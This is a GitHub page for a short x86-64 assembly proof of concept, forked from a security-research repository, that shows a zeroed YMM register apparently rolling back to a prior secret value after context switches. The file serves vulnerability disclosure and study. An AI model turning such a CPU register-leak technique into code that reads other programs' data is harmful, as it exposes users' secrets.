forked from google/security-research
-
Notifications
You must be signed in to change notification settings - Fork 0
/
zenymmasm.asm
44 lines (37 loc) · 992 Bytes
/
zenymmasm.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
BITS 64
global _start
%define SYS_sched_yield 0x18
%define SYS_write 0x01
%define SYS_exit 0x3c
section .data
align 32
secret: times 4 dq 'SECRET'
align 32
regstate: dq 0,0,0,0
align 32
space: dd 1
section .text
_start:
vmovdqu ymm0, [rel secret]
mov rax, SYS_sched_yield
syscall
; The value of ymm0 should now be zero.
vpxor ymm0, ymm0, ymm0
; Force a context switch.
mov rax, SYS_sched_yield
syscall
; This sequence somehow "rolls" it back to the previous value?!?!
ucomiss xmm0, dword [rel space]
mov rax, SYS_sched_yield
syscall
; We can dump it to stdout to verify.
vmovdqu [rel regstate], ymm0
mov rax, SYS_write
mov rdi, 1
lea rsi, [rel regstate]
mov rdx, 32
syscall
mov rax, SYS_exit
mov rdi, 0
syscall
int3